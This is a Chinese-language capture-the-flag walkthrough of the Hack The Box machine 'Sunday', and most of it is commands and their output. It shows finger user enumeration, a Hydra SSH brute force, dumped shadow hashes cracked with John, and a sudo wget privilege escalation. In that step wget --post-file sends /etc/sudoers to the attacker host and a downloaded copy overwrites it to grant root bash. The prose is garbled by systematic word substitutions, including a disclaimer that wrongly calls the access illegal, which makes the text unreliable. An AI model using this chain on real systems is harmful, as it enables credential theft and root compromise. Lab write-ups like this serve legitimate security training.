免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务发现
这个靶机十分的不稳固,先用--open参数看看有哪些端口关上
┌──(rootkali)-[~/htb/Sunday]└─# nmap -p- 10.10.10.76 --openStarting Nmap 7.91 ( https://nmap.org ) at 2021-12-16 09:22 ESTStats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth ScanSYN Stealth Scan Timing: About 1.35% done; ETC: 09:32 (0:09:46 remaining)Nmap scan report for 10.10.10.76Host is up (0.30s latency).Not shown: 44865 filtered ports, 20665 closed portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE79/tcp open finger111/tcp open rpcbind22022/tcp open unknown47097/tcp open unknown58984/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 653.01 seconds指定端口,获取服务详细信息看看
┌──(rootkali)-[~/htb/Sunday]└─# nmap -sV -sC 10.10.10.76 -A -O -p 79,111,22022,47097,58984Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-16 09:36 ESTNmap scan report for 10.10.10.76Host is up (0.30s latency).PORT STATE SERVICE VERSION79/tcp open finger Sun Solaris fingerd|_finger: No one logged on\x0D111/tcp open rpcbind22022/tcp open ssh SunSSH 1.3 (protocol 2.0)| ssh-hostkey: | 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)47097/tcp open unknown58984/tcp open unknownWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: WAP|phoneRunning: Linux 2.4.X|2.6.X, Sony Ericsson embeddedOS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivazOS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phoneNetwork Distance: 21 hopsService Info: OS: Solaris; CPE: cpe:/o:sun:sunosTRACEROUTE (using port 79/tcp)HOP RTT ADDRESS1 306.96 ms 10.10.14.12 2362.53 ms 10.10.14.13 2362.68 ms 10.10.14.14 ... 1011 3138.72 ms 10.10.14.112 2460.64 ms 10.10.14.113 ... 2021 297.28 ms 10.10.10.76OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 93.18 secondsfinger服务
79端口在hacktricks是这样介绍的
Finger is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files.
也就说这个服务能够回显一些靶机的用户信息,比方
┌──(rootkali)-[~/htb/sunday]└─# finger root@10.10.10.76 1 ⨯Login Name TTY Idle When Whereroot Super-User pts/3 <Apr 24, 2018> sunday 然而如果探测一个不存在的用户,则啥都没有
┌──(rootkali)-[~/htb/sunday]└─# finger asdjkasjd@10.10.10.76Login Name TTY Idle When Whereasdjkasjd ???因而,利用这个性能,咱们能够晓得靶机上有哪些实在存在的用户。
应用这个字典
以及msf外面的scanner/finger/finger_users模块,探测到以下用户信息
msf6 auxiliary(scanner/finger/finger_users) > run[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: nobody[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: noaccess[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: nobody4[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: adm[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: lp[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: uucp[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: nuucp[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: dladm[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: listen[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: smmsp[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: sammy[+] 10.10.10.76:79 - 10.10.10.76:79 - Found user: sunny[+] 10.10.10.76:79 - 10.10.10.76:79 Users found: adm, dladm, listen, lp, noaccess, nobody, nobody4, nuucp, sammy, smmsp, sunny, uucp[*] 10.10.10.76:79 - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedsammy和sunny看上去比拟像能够用ssh登录的用户
测试一下
finger sammy@10.10.10.76Login Name TTY Idle When Wheresammy sammy console <Jul 31, 2020> ┌──(rootkali)-[~/htb/sunday]└─# finger sunny@10.10.10.76Login Name TTY Idle When Wheresunny sunny pts/3 <Apr 24, 2018> 10.10.14.4 保留到user.txt,应用hydra爆破ssh
┌──(rootkali)-[~/htb/sunday]└─# hydra -L /root/htb/sunday/user.txt -P /usr/share/wordlists/rockyou.txt -I -f -s 22022 10.10.10.76 sshHydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 10:59:18[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try per task[DATA] attacking ssh://10.10.10.76:22022/[22022][ssh] host: 10.10.10.76 login: sunny password: sunday1 of 1 target successfully completed, 1 valid password foundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 10:59:23失去一个ssh用户凭证:sunny : sunday
初始shell
sunny@sunday:~/Documents$ find / -name user.txtfind: /export/home/sammy/.gnome2: Permission deniedfind: /export/home/sammy/.gconf: Permission denied/export/home/sammy/Desktop/user.txt在sammy目录下,没有user.txt的应用权限,看来须要横向提权到sammy
在backup目录下找打shadow的备份文件
sunny@sunday:/backup$ lsagent22.backup shadow.backupsunny@sunday:/backup$ cat shadow.backup mysql:NP:::::::openldap:*LK*:::::::webservd:*LK*:::::::postgres:NP:::::::svctag:*LK*:6445::::::nobody:*LK*:6445::::::noaccess:*LK*:6445::::::nobody4:*LK*:6445::::::sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::写两个文件,passwd和shadow
┌──(rootkali)-[~/htb/Sunday]└─# cat passwd sammy:x:101:10:sammy:/export/home/sammy:/bin/bash ┌──(rootkali)-[~/htb/Sunday]└─# cat shadow sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::用unshadow命令把下面两个文件合并成一个john能够辨认的哈希文件
┌──(rootkali)-[~/htb/Sunday]└─# unshadow passwd shadow >pass.hash 爆破这个hash文件
┌──(rootkali)-[~/htb/Sunday]└─# john --wordlist=/usr/share/wordlists/rockyou.txt pass.hash Using default input encoding: UTF-8Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])Cost 1 (iteration count) is 5000 for all loaded hashesWill run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statuscooldude! (sammy)1g 0:00:01:11 DONE (2021-12-16 21:35) 0.01393g/s 2839p/s 2839c/s 2839C/s domonique1..chrystelleUse the "--show" option to display all of the cracked passwords reliablySession completed当初咱们失去了sammy的ssh明码:cooldude!
提权
查看sammy的sudo特权
sunny@sunday:/home$ sudo -lUser sammy may run the following commands on this host: (root) NOPASSWD: /usr/bin/wget能够root身份应用wget,能够利用这个命令提权到root,步骤如下:
在kali起一个监听,接管文件
nc -lnvp 80
发送文件到kali
sudo /usr/bin/wget --post-file=/etc/sudoers 10.10.14.6
接管到文件sudoers
┌──(rootkali)-[~/htb/Sunday]└─# nc -lnvp 80 listening on [any] 80 ...connect to [10.10.14.6] from (UNKNOWN) [10.10.10.76] 38814POST / HTTP/1.0User-Agent: Wget/1.10.2Accept: */*Host: 10.10.14.6Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 795# sudoers file.## This file MUST be edited with the 'visudo' command as root.# Failure to use 'visudo' may result in syntax or file permission errors# that prevent sudo from running.## See the sudoers man page for the details on how to write a sudoers file.## Host alias specification# User alias specification# Cmnd alias specification# Defaults specification# Runas alias specification# User privilege specificationroot ALL=(ALL) ALL# Uncomment to allow people in group wheel to run all commands# %wheel ALL=(ALL) ALL# Same thing without a password# %wheel ALL=(ALL) NOPASSWD: ALL# Samples# %users ALL=/sbin/mount /cdrom,/sbin/umount /cdrom# %users localhost=/sbin/shutdown -h nowsammy ALL=(root) NOPASSWD: /usr/bin/wgetsunny ALL=(root) NOPASSWD: /root/troll- 在本地把下面文件内容保留为sudoers,并且在最下方增加上面这行
sammy ALL=(root) NOPASSWD: /bin/bash
在kali开启一个http服务
python3 -m http.server
- 靶机接管文件,并且笼罩到
/etc/sudoers
sudo /usr/bin/wget http://10.10.14.6:8000/sudoers -O /etc/sudoers
sunny@sunday:/home$ sudo /usr/bin/wget http://10.10.14.6:8000/sudoers -O /etc/sudoers--08:27:33-- http://10.10.14.6:8000/sudoers => `/etc/sudoers'Connecting to 10.10.14.6:8000... 已连贯。已收回 HTTP 申请,正在期待回应... 200 OK长度:850 [application/octet-stream]100%[================================================================================================================================================================================================>] 850 --.--K/s 08:27:34 (1.01 MB/s) - `/etc/sudoers' saved [850/850]当初查看,咱们有了bash特权
sunny@sunday:/home$ sudo -lUser sammy may run the following commands on this host: (root) NOPASSWD: /usr/bin/wget (root) NOPASSWD: /bin/bash间接提权到root
sunny@sunday:/home$ sudo /bin/bash -proot@sunday:/home# iduid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon)root@sunday:/home# whoamiroot总结
切入点就是finger泄露的用户信息一步步浸透进零碎,提权也很简略。然而这台靶机真是太不稳固了,体验好差,上论坛发现也是一堆人在吐槽。
枚举finger的时候能够不必msf,github上很多枚举脚本。